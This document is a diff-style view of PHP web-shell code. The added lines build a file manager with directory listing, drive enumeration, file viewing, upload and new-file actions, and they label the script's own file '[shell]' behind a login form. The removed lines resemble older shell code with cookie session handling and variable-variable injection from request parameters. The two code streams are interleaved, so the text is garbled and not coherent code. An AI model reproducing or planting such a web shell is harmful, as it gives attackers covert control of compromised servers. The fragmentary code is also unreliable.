| 520 | + | $fh = fopen($path, 'r'); if (!$fh){error('Could not open file',$ver);}echo '<table style="font-size:10px; width:100%; background:#222; ">';if ($stringnum){$i=1;while(!feof($fh) & $i<=30) {$line = fgets($fh); echo '<tr style="background:#242424;"><td style="text-align:center;padding:3px; width:2%; border-right:1px solid #2e2e2e; color:#444;">'.$i.'</td><td>'.htmlspecialchars($line).'</td></tr>'; $i++;}}else {while(!feof($fh) & $i<=30) {$line = fgets($fh); echo '<tr style="background:#242424;"><td>'.htmlspecialchars($line).'</td></tr>'; }}echo '</table>';}
|
| 521 | echo '</td></tr></table></div>';do_footer($ver);die();} | |
| 522 | - | if (!function_exists("ash_sess_put"))
|
| 522 | + | elseif (is_dir($path)) |
| 523 | {
| |
| 524 | $dirs=array(); | |
| 525 | $files=array(); | |
| 526 | - | function ash_sess_put($data) |
| 526 | + | $dir=opendir($path); |
| 527 | while (($file=readdir($dir))!==false) { if ($file=="." || $file=="..") continue;
| |
| 528 | if (is_dir("$path/$file")) {$dirs[]=$file;}
| |
| 529 | else {$files[]=$file;}}closedir($dir);
| |
| 530 | - | global $sess_cookie; |
| 530 | + | |
| 531 | ||
| 532 | - | global $sess_data; |
| 532 | + | else {error('it isn\'t a directory', $ver);}
|
| 533 | if (!$dir){error('An error occured while opening directory '.$path, $ver);}
| |
| 534 | - | ash_buff_prepare(); |
| 534 | + | sort($dirs); |
| 535 | sort($files); | |
| 536 | - | $sess_data = $data; |
| 536 | + | echo "<table style='width:100%; background:#222;'>"; |
| 537 | echo "<tr><td colspan=6 class='filet' style='background:#282828; padding:0px; border-top:1px solid #2e2e2e; height:30px;'>"; | |
| 538 | - | $data = serialize($data); |
| 538 | + | # drives |
| 539 | if ($os == "win") {
| |
| 540 | - | setcookie($sess_cookie,$data); |
| 540 | + | echo "<form method='post' action='' style='padding:0px; margin:0px; float:left;'>";echo "<input type='button' value='Drives:' class='fm' style='font-weight:bold;'>";for($d='c';$d<='z';$d++){if(is_dir($d.":/"))echo "<input type='submit' value='".$d.":/' class='fm' name='path'>"; }echo "</form>";}echo "<form method='post' action='' style='padding:0px; margin:0px; float:right;' >";
|
| 541 | echo "<input type='submit' name='diract' class='fm' value='directory actions' style='margin-bottom:0px; font-weight:bold; color:#666;'><input type='hidden' name='curdir' value='$path'><input type='hidden' name='cmdir' value='$path'><span style='color:#666;'>|</span><input type='submit' name='fileact' value='New File' class='fm'><span style='color:#666;'>|</span><input type='submit' style='margin:0px;' name='fileact' value='New Dir' class='fm'><span style='color:#666;'>|</span><input type='submit' name='fileact' value='Upload' class='fm'>";echo "</form>"; | |
| 542 | echo "</td></tr>";echo "<tr style='background:#272727;'><td style='width:3%; '> </td><td style='width:300px; color:#888;' class='filet'><b>name</b></td><td class='filet' style='color:#888;'><b>size</b></td><td class='filet' style='color:#888;'><b>last modified</b></td><td class='filet' style='color:#888;'><b>permissions</b></td></tr>";echo "<form method='post' action=''><input type='hidden' name='f_path' value='$path'>"; | |
| 543 | for ($i=0; $i<count($dirs); $i++) {
| |
| 544 | $size = '---'; | |
| 545 | $perms = fperms($path."/".$dirs[$i]); | |
| 546 | - | foreach (array("sort","sql_sort") as $v)
|
| 546 | + | $ico = '<b>dir</b>'; |
| 547 | $last_mod = date('d.m.y H:i:s', fileatime($path."/".$file));if(!$last_mod){$last_mod = "---";}
| |
| 548 | echo" <tr style='background:#252525;'><td class='ico'>[$ico]</td><td style='width:300px;'><input type='submit' name='f_file' class='dir' value='$dirs[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>";} | |
| 549 | ||
| 550 | - | if (!empty($_GET[$v])) {$$v = $_GET[$v];}
|
| 550 | + | for ($i=0; $i<count($files); $i++) {
|
| 551 | # filesize | |
| 552 | - | if (!empty($_POST[$v])) {$$v = $_POST[$v];}
|
| 552 | + | if (is_link($path."/".$files[$i])) {$size = "---";} else {$size = filesize($path."/".$files[$i]); $size = conv_size($size); if($size == '0B'){$size = '---';} }
|
| 553 | # date | |
| 554 | $last_mod = date('d.m.y H:i:s', fileatime($path."/".$files[$i]));if(!$last_mod){$last_mod = "---";}
| |
| 555 | #perms | |
| 556 | - | if ($sort_save) |
| 556 | + | $perms = fperms($path."/".$files[$i]); |
| 557 | #filetype (ico) | |
| 558 | $ico = ''; if(is_link($path."/".$files[$i])) {$ico = 'link';}
| |
| 559 | else{
| |
| 560 | - | if (!empty($sort)) {setcookie("sort",$sort);}
|
| 560 | + | // filetypes for file manager |
| 561 | $filetypes = array( | |
| 562 | - | if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
|
| 562 | + | "php"=> array("php","phtml","php3","php4","inc"),
|
| 563 | "exe"=>array("sh","install","bat","cmd"),
| |
| 564 | "ini"=>array("ini","inf"),
| |
| 565 | "html"=>array("html","htm","shtml"),
| |
| 566 | - | if (!function_exists("str2mini"))
|
| 566 | + | "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
|
| 567 | "code"=>array("tcl","h","c","cpp", "pl", "cgi"),
| |
| 568 | "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
| |
| 569 | "sdb"=>array("sdb"),
| |
| 570 | - | function str2mini($content,$len) |
| 570 | + | "sess"=>array("sess"),
|
| 571 | "dwnld"=>array("exe","com","pif","src","lnk","zip","rar")
| |
| 572 | ); | |
| 573 | $filename = $files[$i]; $ext = explode(".",$filename);$c = count($ext)-1;$ext = $ext[$c];$ext = strtolower($ext);$rft = "";foreach($filetypes as $key=>$value){if (in_array($ext,$value)) {$ico = $key; break;} } if($ico==''){$ico = 'none';}}
| |
| 574 | - | if (strlen($content) > $len) |
| 574 | + | $wtf = '/'.$files[$i];if ($wtf == $_SERVER['SCRIPT_NAME']) {echo"<tr style='background:#292929;'><td class='ico' style='color:#666;'>[shell]</td><td style='width:300px;'><input type='submit' style='background:#292929;' name='f_file' class='file' value='$files[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>";}
|
| 575 | else {
| |
| 576 | echo"<tr style='background:#252525;'><td class='ico'>[$ico]</td><td style='width:300px;'><input type='submit' name='f_file' class='file' value='$files[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>"; } | |
| 577 | }echo '</form></table><div style="padding-left:2px; padding-right:2px; padding-bottom:4px; background:#222;"><div class="filet" style="background:#272727; border-bottom:1px solid #2e2e2e"> </div></div>';do_footer($ver);} | |
| 578 | - | $len = ceil($len/2) - 2; |
| 578 | + | else {echo ' <html><head><style>body{background:#333;}</style><title>login </title></head><body><table style="margin-left:100px; margin-top:100px; background:#222; font-family:Verdana; font-size:10px; color:#999; padding:4px; width:100%:"><tr><td><form method="post" style="margin:0px; padding:)px;">login: <input type="text" name="login" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;"> password: <input type="text" name="password" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;"> <input type="submit" style="color:#999; border:0px; font-size:10px; background:#262626; height:20px;; font-family:Verdana;" value="go"></form></td></tr></table></body></html>';}
|
| 579 | ?> |
